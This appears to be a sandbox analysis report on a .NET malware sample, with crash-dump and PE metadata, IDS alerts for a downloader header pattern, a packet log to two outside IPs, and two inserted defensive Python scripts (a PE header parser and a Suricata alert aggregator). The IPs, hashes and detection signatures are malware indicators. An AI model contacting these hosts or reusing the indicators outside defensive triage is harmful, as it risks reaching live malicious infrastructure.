                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.9.0.0.4.6.2.0.2.4.6.4.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.9.0.0.4.6.3.7.1.2.1.4.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.d.8.b.2.c.5.-.b.1.6.3.-.4.2.c.f.-.9.e.b.b.-.b.8.d.f.f.9.9.0.0.c.0.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.8.6.5.9.3.1.-.9.4.c.3.-.4.7.e.e.-.8.8.a.5.-.f.c.d.5.9.d.c.d.3.d.9.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.7.2.7.4.2.6.2.8.6.c.f.4.6.9.6.7.5.e.3.a.7.f.a.e.4.3.b.5.e.2.e.f.c.c.1.5.6.3.9.a.e.0.8.e.5.0.6.7.d.e.3.6.f.3.1.2.9.e.2.e.b.6.7.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.m.i.n.g.t.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.6.c.-.0.0.0.1.-.0.0.1.4.-.0.c.e.8.-.9.6.e.1.b.9.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.9.8.8.e.2.8.5.0.b.2.7.a.5.1.4.0.b.2.b.b.f.4.8.3.c.d.7.9.b.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Sep 27 08:47:43 2024, 0x1205a4 type
                                                                                  Category:dropped
                                                                                  Size (bytes):335543
                                                                                  Entropy (8bit):3.473875774787412
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:lEZr/wycCXaIoVT+JxJXfKdJGDbf4uEqeNWLTglOnThN:lEZEyraI+SJxJX+0bf4RUTgl6
                                                                                  MD5:0F5BD37B2373B078F1F9CEE26E05C5F7
                                                                                  SHA1:1F26272E18D4CD81C951EF0A7AA9A177C23BC3ED
                                                                                  SHA-256:9DF49C62914D66216A0EAF4EA77C1EFB72953EB486C91EDE77EECAFECAF1D21F
                                                                                  SHA-512:9BB000B7EFA8656CC36E7A1C7739450B32E7E74129F30A93E52D5A37822132B75934CF5895E8165DAEFEA85DCB38699A323F6C3DD806B6F264F94B243CC9549D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:MDMP..a..... ......./q.f............4............ ..H.......<...\*......t)...i..........`.......8...........T............X...............*...........,..............................................................................eJ.......-......GenuineIntel............T.......l....q.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):8624
                                                                                  Entropy (8bit):3.7081594073212356
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:R6l7wVeJEW65nr6YNRSUplgmfZJEGprq89bm7sfiAim:R6lXJ965nr6YLSUplgmfkYmAfiE
                                                                                  MD5:9218E65E651B96FB56284C70B7846E8D
                                                                                  SHA1:05DDE774538188B9350CDCDCC1A47A6D10E59914
                                                                                  SHA-256:6FDB882B8AC448C577DB01C7A4941674C641491EC7182F795DAB0671901EE65E
                                                                                  SHA-512:E1C8F6F809E80A644603DDAD9A62A45887CE949974F70270343BD2E5AB8FDBC1C6D1C5567DA8512BE47B824FD0F86929C6D94A7503273C9B2763E9B440E26581
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.6.4.<./.P.i.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):5004
                                                                                  Entropy (8bit):4.600265148840576
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cvIwWl8zsYJg77aI99qWpW8VYjkjYm8M4JxYoJFb+q8vXSQAxfQfLId:uIjfeI7DL7VR2JxjKijfQfkd
                                                                                  MD5:0C05A3147DC08149272D34C23FA287C1
                                                                                  SHA1:79A0E8406B3A48F350168789609867414E899DAE
                                                                                  SHA-256:5DAADCE804753D8695F06D44D6DBA8B877C9C56E1032A0E8A05B3A568FD7776C
                                                                                  SHA-512:4B52A90F8FB4E2D8962578DCB741525C643039D083996B658C0DA3C561DCB02120235858776813D2FBE1A6F6D6A3440D9BD9D62D72E938FB807725A129E21B2A
                                                                                  Malicious:false
                                                                                  Reputation:low
Preview (CRLF line breaks restored):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
 <tlm>
 <src>
 <desc>
 <mach>
 <os>
 <arg nm="vermaj" val="10" />
 <arg nm="vermin" val="0" />
 <arg nm="verbld" val="19045" />
 <arg nm="vercsdbld" val="2006" />
 <arg nm="verqfe" val="2006" />
 <arg nm="csdbld" val="2006" />
 <arg nm="versp" val="0" />
 <arg nm="arch" val="9" />
 <arg nm="lcid" val="2057" />
 <arg nm="geoid" val="223" />
 <arg nm="sku" val="48" />
 <arg nm="domain" val="0" />
 <arg nm="prodsuite" val="256" />
 <arg nm="ntprodtype" val="1" />
 <arg nm="platid" val="2" />
 <arg nm="tmsi" val="518390" />
 <arg nm="osinsty" val="1" />
 <arg nm="iever" val="11.789.19041.0-11.0.1000" />
 <arg nm="portos" val="0" />
 <arg nm="ram" val="409
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):1835008
                                                                                  Entropy (8bit):4.417255435985839
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:4cifpi6ceLPL9skLmb0mQSWSPtaJG8nAgex285i2MMhA20X4WABlGuNA5+:ti58QSWIZBk2MM6AFB6o
                                                                                  MD5:A3DC8F5250BDA2178B2C6C31AD33C0DD
                                                                                  SHA1:F7898F19AEAF1894F9371D27F04F20D2FE5D3846
                                                                                  SHA-256:9DB665242E5B184AB23472620E2DF3F79D584AE63B2F9B3BA4EAF73F1242934D
                                                                                  SHA-512:DAAA423F857C05BD148734E543C97ACA0A7608B8ABCFA3CC39DADD4AF22330F3C76F306870A3601768AF63EC978E8931035E1F928C739649A09D2CB037545AED
                                                                                  Malicious:false
                                                                                  Reputation:low
Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.r. (registry hive header with the UTF-16 path \AppCompat\Programs\Amcache.hve; the rest of the preview is non-printable bytes, rendered as dots)
                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):5.61892036333007
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                  File name:1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  File size:279'040 bytes
                                                                                  MD5:b046211fe3f420a9ceb7663a560ece96
                                                                                  SHA1:785a1cff39f2a75cbfffed3d718e9e026b3c80a1
                                                                                  SHA256:96134c810750cc56e372551f8070f06aee80ae0cc8eeac983502d6b8f66c77df
                                                                                  SHA512:5a0fc701606682de24dfc1b8408b6d7c13205952128b211b9b7ef11a97871f2590d7c705b4032eab6a5661a1295fe4bc8bb58418b68e999e8fdd315009ca7eb3
                                                                                  SSDEEP:3072:lL6hDp5qqQjolo+XgVfXACCBc9jKnfL83mwnbItgQ2eXPs0lUY/VgMiObbY:gn5wnb+gWxb
                                                                                  TLSH:7654841D2BD49810E2FF8977C2B65125C6BBB4A346258D3E16D1E81A3F3E580DE06F63
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............P..,...........K... ...`....@.. ....................................@................................
                                                                                  Icon Hash:00928e8e8686b000
                                                                                  Entrypoint:0x444b0e
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x669085D9 [Fri Jul 12 01:24:41 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
add byte ptr [eax], al (repeated for the rest of the listing: the bytes after the six-byte jmp stub are zero padding, and 00 00 disassembles as add byte ptr [eax], al)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x44abc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x46000 | 0x1017 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x48000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x42b14 | 0x42c00 | d36eabe48ced213e9155dfdc9f9efb9b | False | 0.21219935042134833 | SysEx File - | 5.620523978083059 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x46000 | 0x1017 | 0x1200 | 78b97a769c57cf460625c961b04b1a16 | False | 0.3543836805555556 | data | 4.76801789588623 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x48000 | 0xc | 0x200 | 0f43dd090ca3c812d8980b8f7ea3aff8 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x460a0 | 0x31c | data | | | 0.4271356783919598
RT_MANIFEST | 0x463bc | 0xc5b | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.3926651912741069
DLL | Import
mscoree.dll | _CorExeMain
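The static tables above carry the three header facts that mark this file as a managed (.NET) PE32 rather than native code: the entry point is a six-byte `jmp dword ptr [00402000h]`, the IAT directory sits at RVA 0x2000 (image base 0x400000 + 0x2000 = 0x402000, so the jump goes through the one IAT slot), and the only import is mscoree.dll!_CorExeMain, with the CLR header in the COM_DESCRIPTOR directory at RVA 0x2008. The parser below is an added example, not code from the Joe Sandbox report: it reads those header fields with the standard library only (DOS header, COFF header, PE32 optional header, data directories, section table), checks the entry-stub/IAT relationship, and computes the 8-bit Shannon entropy the report shows per section. Resolving the IAT slot to _CorExeMain through the import directory is deliberately left out to keep it short. Run stand-alone it parses `build_minimal_clr_pe()`, a constructed PE32 stand-in with the same header shape as the sample (not the sample itself); pass a file path to run it on a real PE32. All function names are the example's own.

```python
"""Parse PE32 header fields and verify the managed (.NET) entry-point stub. Added example."""
import math
import struct

DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
                   "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
                   "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), as in the report's Entropy column."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe32(data: bytes) -> dict:
    """Minimal PE32 (magic 0x10b) header parser: entry RVA, image base, directories, sections."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _ts, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                      # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]    # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", data, opt + 28)[0]   # ImageBase (PE32: 4 bytes)
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]        # NumberOfRvaAndSizes
    dirs = {}
    for i in range(min(ndirs, 16)):                            # directories start at +96
        dirs[DIRECTORY_NAMES[i]] = struct.unpack_from("<II", data, opt + 96 + 8 * i)
    sections = []
    sec = opt + opt_size                                       # section table, 40 bytes each
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, sec + 40 * i)
        raw = data[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode(), "vaddr": vaddr, "vsize": vsize,
                         "rawptr": rawptr, "rawsize": rawsize, "entropy": shannon_entropy(raw)})
    return {"machine": machine, "entry_rva": entry_rva, "image_base": image_base,
            "dirs": dirs, "sections": sections}


def rva_to_offset(pe: dict, rva: int) -> int:
    """Map an RVA to a file offset through the section that contains it."""
    for s in pe["sections"]:
        if s["vaddr"] <= rva < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            return rva - s["vaddr"] + s["rawptr"]
    raise ValueError(f"RVA {rva:#x} is not inside any section")


def is_clr_entry_stub(data: bytes, pe: dict) -> bool:
    """True when the native entry point is 'jmp dword ptr [image_base + IAT RVA]' (FF 25 disp32)
    and a CLR header (COM_DESCRIPTOR) is present: the shape of every managed PE32's entry."""
    off = rva_to_offset(pe, pe["entry_rva"])
    if data[off:off + 2] != b"\xff\x25":
        return False
    target = struct.unpack_from("<I", data, off + 2)[0]
    iat_rva, _ = pe["dirs"].get("IAT", (0, 0))
    _, clr_size = pe["dirs"].get("COM_DESCRIPTOR", (0, 0))
    return target == pe["image_base"] + iat_rva and clr_size != 0


def build_minimal_clr_pe() -> bytes:
    """Constructed stand-in (not the analysed sample): one .text section at RVA 0x2000 holding the
    IAT slot (0x2000), a zeroed CLR header (0x2008) and a 'jmp [0x402000]' stub at RVA 0x2050."""
    image_base, text_rva, text_raw, entry_off = 0x400000, 0x2000, 0x200, 0x50
    text = bytearray(0x200)
    text[entry_off:entry_off + 6] = b"\xff\x25" + struct.pack("<I", image_base + text_rva)
    dirs = [(0, 0)] * 16
    dirs[12] = (text_rva, 8)            # IAT: one 4-byte slot plus terminator
    dirs[14] = (text_rva + 8, 0x48)     # COM_DESCRIPTOR: 0x48-byte CLR header
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 8, 0, len(text), 0, 0, text_rva + entry_off, text_rva, 0, image_base,
                      0x2000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x4000, 0x200, 0, 2, 0x8540,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text), text_rva, len(text), text_raw,
                          0, 0, 0, 0, 0x60000020)
    header = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0" + coff + opt + section
    return header.ljust(text_raw, b"\0") + bytes(text)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_clr_pe()
    pe = parse_pe32(blob)
    print(f"entry {pe['entry_rva']:#x}  image base {pe['image_base']:#x}  "
          f"IAT {pe['dirs']['IAT']}  CLR header {pe['dirs']['COM_DESCRIPTOR']}  "
          f"managed entry stub: {is_clr_entry_stub(blob, pe)}")
    for s in pe["sections"]:
        print(f"{s['name']:8} rva {s['vaddr']:#x} raw {s['rawsize']:#x} entropy {s['entropy']:.3f}")
```

The stub check is a cheap triage signal, not an identification: a managed PE always has this entry shape, so a native entry point in a file that also carries a CLR header (or vice versa) is worth a closer look. The .text entropy of 5.62 in the report is what unobfuscated CIL plus metadata typically yields; packed or encrypted payload sections sit closer to 7.5 and above.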
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T10:47:30.112737+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49699 | 158.101.44.242 | 80 | TCP
2024-09-27T10:47:31.175032+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49699 | 158.101.44.242 | 80 | TCP
2024-09-27T10:47:31.786222+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49701 | 188.114.97.3 | 443 | TCP
2024-09-27T10:47:32.424999+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49702 | 158.101.44.242 | 80 | TCP
2024-09-27T10:47:32.974719+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49703 | 188.114.97.3 | 443 | TCP
2024-09-27T10:47:34.175636+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49705 | 188.114.97.3 | 443 | TCP
2024-09-27T10:47:38.978463+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49713 | 188.114.97.3 | 443 | TCP
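The IDS table above is the part of a sandbox run that turns most directly into hunting material: two destinations, one reached in clear text on port 80 and one over TLS on port 443, each hit from several different client ports within a few seconds (that is, several separate connections, not one long session). The script below is an added example, not part of the Joe Sandbox report: it reads Suricata EVE JSON alert records, aggregates them per destination (count, first and last seen, SIDs, worst severity, number of distinct client ports) and emits a sorted `ip:port` IOC list. The sample records are constructed for this example; their field values are copied from the table, and only the EVE fields the code uses are populated.

```python
"""Aggregate Suricata EVE alert records into per-destination IOCs. Added example."""
import json
from datetime import datetime

EVE_TS = "%Y-%m-%dT%H:%M:%S.%f%z"   # Suricata's default EVE timestamp layout

# Constructed EVE 'alert' lines mirroring the report's IDS table (values from the table,
# JSON shape from Suricata's EVE output; fields not used below are omitted).
SAMPLE_EVE_LINES = [
    json.dumps({"timestamp": ts, "event_type": "alert", "src_ip": "192.168.2.7", "src_port": sp,
                "dest_ip": dip, "dest_port": dp, "proto": "TCP",
                "alert": {"signature_id": sid, "signature": sig, "severity": sev}})
    for ts, sp, dip, dp, sid, sig, sev in [
        ("2024-09-27T10:47:30.112737+0200", 49699, "158.101.44.242", 80, 2803274,
         "ETPRO MALWARE Common Downloader Header Pattern UH", 2),
        ("2024-09-27T10:47:31.175032+0200", 49699, "158.101.44.242", 80, 2803274,
         "ETPRO MALWARE Common Downloader Header Pattern UH", 2),
        ("2024-09-27T10:47:31.786222+0200", 49701, "188.114.97.3", 443, 2803305,
         "ETPRO MALWARE Common Downloader Header Pattern H", 3),
        ("2024-09-27T10:47:32.424999+0200", 49702, "158.101.44.242", 80, 2803274,
         "ETPRO MALWARE Common Downloader Header Pattern UH", 2),
        ("2024-09-27T10:47:32.974719+0200", 49703, "188.114.97.3", 443, 2803305,
         "ETPRO MALWARE Common Downloader Header Pattern H", 3),
        ("2024-09-27T10:47:34.175636+0200", 49705, "188.114.97.3", 443, 2803305,
         "ETPRO MALWARE Common Downloader Header Pattern H", 3),
        ("2024-09-27T10:47:38.978463+0200", 49713, "188.114.97.3", 443, 2803305,
         "ETPRO MALWARE Common Downloader Header Pattern H", 3),
    ]
]


def parse_eve_alerts(lines):
    """Keep only event_type == 'alert' records, with the timestamp parsed; skip malformed lines."""
    alerts = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue                      # EVE files are append-only; a torn last line is common
        if rec.get("event_type") != "alert":
            continue                      # flow, tls, http ... records are not alerts
        rec["ts"] = datetime.strptime(rec["timestamp"], EVE_TS)
        alerts.append(rec)
    return alerts


def summarize_destinations(alerts):
    """Aggregate per (dest_ip, dest_port, proto). Suricata severity: 1 is the most severe."""
    summary = {}
    for a in sorted(alerts, key=lambda r: r["ts"]):
        key = (a["dest_ip"], a["dest_port"], a["proto"])
        e = summary.setdefault(key, {"count": 0, "first_seen": a["ts"], "last_seen": a["ts"],
                                     "sids": set(), "signatures": set(),
                                     "severity": a["alert"]["severity"], "client_ports": set()})
        e["count"] += 1
        e["last_seen"] = a["ts"]
        e["sids"].add(a["alert"]["signature_id"])
        e["signatures"].add(a["alert"]["signature"])
        e["severity"] = min(e["severity"], a["alert"]["severity"])
        e["client_ports"].add(a["src_port"])   # distinct client ports ~ distinct connections
    return summary


def iocs(summary):
    """Sorted 'ip:port' strings for a blocklist or SIEM lookup."""
    return sorted(f"{ip}:{port}" for ip, port, _ in summary)


def render(summary):
    """One line per destination, ordered by first sighting."""
    rows = []
    for (ip, port, proto), e in sorted(summary.items(), key=lambda kv: kv[1]["first_seen"]):
        rows.append(f"{ip}:{port}/{proto} alerts={e['count']} worst_sev={e['severity']} "
                    f"first={e['first_seen'].isoformat()} last={e['last_seen'].isoformat()} "
                    f"sids={sorted(e['sids'])} connections={len(e['client_ports'])}")
    return "\n".join(rows)


if __name__ == "__main__":
    summary = summarize_destinations(parse_eve_alerts(SAMPLE_EVE_LINES))
    print(render(summary))
    print("IOCs:", ", ".join(iocs(summary)))
```

The distinct-client-port count is the detail worth keeping when these IOCs go into a ticket: four separate TLS connections to the same host within eight seconds is a stronger beaconing indicator than four alerts on one connection, and the aggregation preserves that difference where a plain alert count would not. Sandbox IPs are short-lived; treat the destinations as a starting point for pivoting (passive DNS, certificate data for the 443 endpoint) rather than as a durable blocklist.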
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 10:47:29.289355993 CEST | 49699 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:29.294223070 CEST | 80 | 49699 | 158.101.44.242 | 192.168.2.7
Sep 27, 2024 10:47:29.294298887 CEST | 49699 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:29.294574976 CEST | 49699 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:29.299377918 CEST | 80 | 49699 | 158.101.44.242 | 192.168.2.7
Sep 27, 2024 10:47:29.910844088 CEST | 80 | 49699 | 158.101.44.242 | 192.168.2.7
Sep 27, 2024 10:47:29.915019035 CEST | 49699 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:29.919962883 CEST | 80 | 49699 | 158.101.44.242 | 192.168.2.7
Sep 27, 2024 10:47:30.066852093 CEST | 80 | 49699 | 158.101.44.242 | 192.168.2.7
Sep 27, 2024 10:47:30.112736940 CEST | 49699 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:30.136713028 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:30.136749983 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:30.136864901 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:30.146043062 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:30.146065950 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:30.625891924 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:30.626159906 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:30.632381916 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:30.632405043 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:30.632764101 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:30.675134897 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:30.684118032 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:30.731405973 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:30.793179989 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:30.793287039 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:30.793457031 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:30.881700993 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:30.931173086 CEST | 49699 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:30.936080933 CEST | 80 | 49699 | 158.101.44.242 | 192.168.2.7
Sep 27, 2024 10:47:31.133038044 CEST | 80 | 49699 | 158.101.44.242 | 192.168.2.7
Sep 27, 2024 10:47:31.161760092 CEST | 49701 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:31.161828041 CEST | 443 | 49701 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:31.161896944 CEST | 49701 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:31.162229061 CEST | 49701 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:31.162242889 CEST | 443 | 49701 | 188.114.97.3 | 192.168.2.7
